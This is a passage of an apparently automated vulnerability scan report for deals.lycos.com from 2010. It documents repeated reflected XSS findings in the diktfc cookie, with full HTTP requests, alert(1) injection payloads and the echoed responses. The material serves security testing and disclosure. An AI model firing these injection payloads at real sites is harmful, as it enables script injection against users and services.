This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/mirror-s-edge-for-iphone-for-1-414300 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4d87f"%3balert(1)//0adce29b43c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:47 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4d87f";alert(1)//0adce29b43c"
});
</script>
...[SNIP]...

1.213. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56d85"%3balert(1)//7f46c76a176 was submitted in the diktfc cookie. This input was echoed as 56d85";alert(1)//7f46c76a176 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A56d85"%3balert(1)//7f46c76a176; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A56d85";alert(1)//7f46c76a176"
});
</script>
...[SNIP]...

1.214. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7362"><script>alert(1)</script>5134e7589ce was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7362"><script>alert(1)</script>5134e7589ce; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:01 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7362"><script>alert(1)</script>5134e7589ce&amp;cj=1" alt="tracker" />
...[SNIP]...

1.215. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e54"%3balert(1)//ca2c7b2c015 was submitted in the diktfc cookie. This input was echoed as 22e54";alert(1)//ca2c7b2c015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A22e54"%3balert(1)//ca2c7b2c015; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:19 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A22e54";alert(1)//ca2c7b2c015"
});
</script>
...[SNIP]...

1.216. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58697"><script>alert(1)</script>383e526ee99 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A58697"><script>alert(1)</script>383e526ee99; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:17 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A58697"><script>alert(1)</script>383e526ee99&amp;cj=1" alt="tracker" />
...[SNIP]...

1.217. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f0b2"><script>alert(1)</script>781860d6eaf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7f0b2"><script>alert(1)</script>781860d6eaf; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7f0b2"><script>alert(1)</script>781860d6eaf&amp;cj=1" alt="tracker" />
...[SNIP]...

1.218. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c764"%3balert(1)//b75df22a01a was submitted in the diktfc cookie. This input was echoed as 2c764";alert(1)//b75df22a01a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2c764"%3balert(1)//b75df22a01a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2c764";alert(1)//b75df22a01a"
});
</script>
...[SNIP]...

1.219. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2720-prepaid-cell-phone-for-6-413497

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8c0"><script>alert(1)</script>d9b09df56e0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/nokia-2720-prepaid-cell-phone-for-6-413497 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c0"><script>alert(1)</script>d9b09df56e0; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
"http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c0"><script>alert(1)</script>d9b09df56e0&amp;cj=1" alt="tracker" />
...[SNIP]...

1.220. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2720-prepaid-cell-phone-for-6-413497

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3b10"%3balert(1)//c0968ffef2c was submitted in the diktfc cookie. This input was echoed as b3b10";alert(1)//c0968ffef2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/nokia-2720-prepaid-cell-phone-for-6-413497 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b10"%3balert(1)//c0968ffef2c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b10";alert(1)//c0968ffef2c"
});
</script>
...[SNIP]...

1.221. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4403f"><script>alert(1)</script>7f5d7171fd2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4403f"><script>alert(1)</script>7f5d7171fd2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4403f"><script>alert(1)</script>7f5d7171fd2&amp;cj=1" alt="tracker" />
...[SNIP]...

1.222. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db343"%3balert(1)//3b16844b478 was submitted in the diktfc cookie. This input was echoed as db343";alert(1)//3b16844b478 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adb343"%3balert(1)//3b16844b478; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
